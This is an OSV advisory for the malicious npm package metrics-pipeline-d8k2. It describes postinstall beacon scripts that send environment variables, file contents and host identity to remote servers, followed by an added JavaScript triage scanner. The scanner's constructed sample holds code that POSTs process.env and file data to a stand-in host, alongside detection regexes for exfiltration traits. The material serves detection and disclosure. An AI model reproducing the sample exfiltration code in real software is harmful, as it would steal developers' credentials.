MAL-2026-5858

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/metrics-pipeline-d8k2/MAL-2026-5858.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5858
Published
2026-06-16T01:34:34Z
Modified
2026-06-16T02:31:45.555662768Z
Summary
Malicious code in metrics-pipeline-d8k2 (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (01ad2ee3d3807102a3f02c01af0d3fec46d91e9764eb77a8bcedf9c6be7fc3b0)

Package declares "postinstall": "node run.js" in package.json, causing automatic execution of bundled beacon scripts on npm install. beacon29.js loads child_process, https, and fs, reads files via fs.readFileSync and reads process.env, gathers host identity (process.platform), and POSTs/GETs the data to remote endpoints; it also references https://registry.npmjs.org and https://npm.pkg.github.com, consistent with credential/token harvesting and potential self-propagation through registry APIs. beacon_linux.js mirrors the pattern on Linux: require('child_process') + require('http') + os.hostname() + os.platform() followed by http.request(...) POST to a remote host. The package's stated 'metrics pipeline' name is a cover; the only behavior on install is host fingerprinting and outbound exfiltration. Installing this package on a developer or CI machine causes immediate compromise: environment variables (which commonly hold cloud and CI tokens), file contents, and host identifiers are sent to attacker-controlled infrastructure without user interaction.
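The install-time pattern described above (lifecycle hook, environment and file reads, host fingerprinting, outbound request) can be triaged statically before anything runs. The following is an added example, not code from the OSV record or from the package; it inspects a parsed package.json plus the text of a package's JS files, and the sample inputs, the `triage` helper and the `example.invalid` host are all constructed for illustration.

```javascript
// Added example (not from the advisory or the package): static triage for the
// install-time beacon pattern described above. It inspects a parsed package.json
// and the text of the package's JS files; nothing is executed.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Each regex maps to a behaviour the advisory names.
const INDICATORS = {
  child_process: /require\(\s*['"]child_process['"]\s*\)/,
  network: /require\(\s*['"]https?['"]\s*\)/,
  file_read: /\bfs\.readFileSync\(/,
  env_read: /\bprocess\.env\b/,
  host_fingerprint: /\bos\.(hostname|platform)\(|\bprocess\.platform\b/,
  registry_url: /https:\/\/(registry\.npmjs\.org|npm\.pkg\.github\.com)/,
  outbound_request: /\bhttps?\.request\(/,
};

// Lifecycle scripts run automatically on `npm install`; list any that are set.
function findLifecycleScripts(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return LIFECYCLE_HOOKS.filter((h) => typeof scripts[h] === 'string')
    .map((h) => ({ hook: h, command: scripts[h] }));
}
function scanSource(text) {
  return Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(text));
}

// Hook + secret-bearing read (env/file) + outbound channel = fingerprint-and-exfiltrate shape.
function triage(pkg, files) {
  const hooks = findLifecycleScripts(pkg);
  const findings = {};
  for (const [name, text] of Object.entries(files)) {
    const hits = scanSource(text);
    if (hits.length > 0) findings[name] = hits;
  }
  const all = new Set(Object.values(findings).flat());
  const exfil = (all.has('env_read') || all.has('file_read')) &&
    (all.has('network') || all.has('outbound_request'));
  return { hooks, findings, suspicious: hooks.length > 0 && exfil };
}

// Constructed sample modelled on the advisory text; hypothetical, not real files.
const SAMPLE_PKG = { name: 'example-pkg', scripts: { postinstall: 'node run.js' } };
const SAMPLE_FILES = {
  'beacon.js': "const cp = require('child_process');\nconst https = require('https');\n" +
    "const fs = require('fs');\nconst d = { env: process.env, p: process.platform, " +
    "f: fs.readFileSync('/etc/hostname', 'utf8') };\n" +
    "https.request({ host: 'example.invalid', method: 'POST' }).end(JSON.stringify(d));\n",
  'index.js': "module.exports = () => 'metrics';\n",
};
```

Run it against an unpacked tarball by reading package.json and each `.js` file into the `files` map; a `suspicious: true` result is a reason to review the package, not a proof of malice on its own.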

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-006723",
            "import_time": "2026-06-16T02:23:11.304743388Z",
            "source": "amazon-inspector",
            "versions": [
                "1.0.3"
            ],
            "modified_time": "2026-06-16T01:34:35Z",
            "sha256": "01ad2ee3d3807102a3f02c01af0d3fec46d91e9764eb77a8bcedf9c6be7fc3b0"
        },
        {
            "id": "IN-MAL-2026-006726",
            "import_time": "2026-06-16T02:23:11.46595368Z",
            "source": "amazon-inspector",
            "versions": [
                "1.0.0"
            ],
            "sha256": "54c1af327fbf53a18b26a293093ff11b2ac19e346468fca66ff083166972dc7f",
            "modified_time": "2026-06-16T01:34:37Z"
        },
        {
            "id": "IN-MAL-2026-006722",
            "import_time": "2026-06-16T02:23:11.229728398Z",
            "source": "amazon-inspector",
            "versions": [
                "1.0.4"
            ],
            "sha256": "5b0d9377de514d01f4b2c4007ca1d7dfd5787ab72c185eb74a6f4f53ac1658ba",
            "modified_time": "2026-06-16T01:34:34Z"
        },
        {
            "id": "IN-MAL-2026-006724",
            "import_time": "2026-06-16T02:23:11.354620754Z",
            "source": "amazon-inspector",
            "versions": [
                "1.0.5"
            ],
            "modified_time": "2026-06-16T01:34:36Z",
            "sha256": "89a516af939e2a8520621d9ef7f847517da94269623a71aea9f2f00d3188a954"
        },
        {
            "id": "IN-MAL-2026-006727",
            "import_time": "2026-06-16T02:23:11.559392458Z",
            "source": "amazon-inspector",
            "versions": [
                "1.0.2"
            ],
            "modified_time": "2026-06-16T01:34:39Z",
            "sha256": "c113970b47b623dedfa59e8ff71bf20bfca793e1e1d9ff76b29eca1bf674dc9f"
        },
        {
            "id": "IN-MAL-2026-006725",
            "import_time": "2026-06-16T02:23:11.40004171Z",
            "source": "amazon-inspector",
            "versions": [
                "1.0.1"
            ],
            "modified_time": "2026-06-16T01:34:36Z",
            "sha256": "3a44ea64194cd8e1b678076116fadf8bc05e764bb8d478c72266cd0bf3874da4"
        }
    ]
}
References
Credits

Affected packages

npm / metrics-pipeline-d8k2

Package

Name
metrics-pipeline-d8k2
Purl
pkg:npm/metrics-pipeline-d8k2

Affected ranges

Affected versions

1.*
1.0.0
1.0.1
1.0.2
1.0.3
1.0.4
1.0.5

Database specific

cwes
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/metrics-pipeline-d8k2/MAL-2026-5858.json"
indicators
{
    "package_integrity": [
        {
            "filename": "metrics-pipeline-d8k2-1.0.3.tgz",
            "hashes": {
                "sha1": "8a26aa479a56a8910b1f7bdef9744ebddfa41248",
                "sha512_sri": "sha512-YsyQJQ4kak4OmsUnk47tUzCxFbyZMQ3TV6Tgu4kz3hk1TRUNTqk8h+LKtgyX8udgfzToUz2cPORZDIDu97kb/Q=="
            }
        }
    ],
    "evidence_files": [
        {
            "path": "beacon29.js",
            "sha256": "1ab07670374fe59d630d1eee53a64c3c4db7b3f9ea7090967041d9799bc35f7f",
            "tlsh": "1a621971e8164da43a42d89dcb0bb4596026b21b3d60fd90b78d758c6fcd15f82728fe"
        },
        {
            "path": "beacon_linux.js",
            "sha256": "60a0fbee8014300d0dd230765cbea7b61e9660a1584ad6a265de71927ff04c68",
            "tlsh": "5db1b7d6a57b41282bd3b89c679f84061823f217b512d8d0b6dc06248fc7924a1a2ded"
        },
        {
            "path": "package.json",
            "sha256": "e360fe53183307ea77dddf0f150015a3ee553dc9db54be3e70f8406c29ffcc51",
            "tlsh": "77f09e589c302c335ac02e990ca19949b6744f1b60847d5e827b1d2801dfe7a30be15d"
        }
    ]
}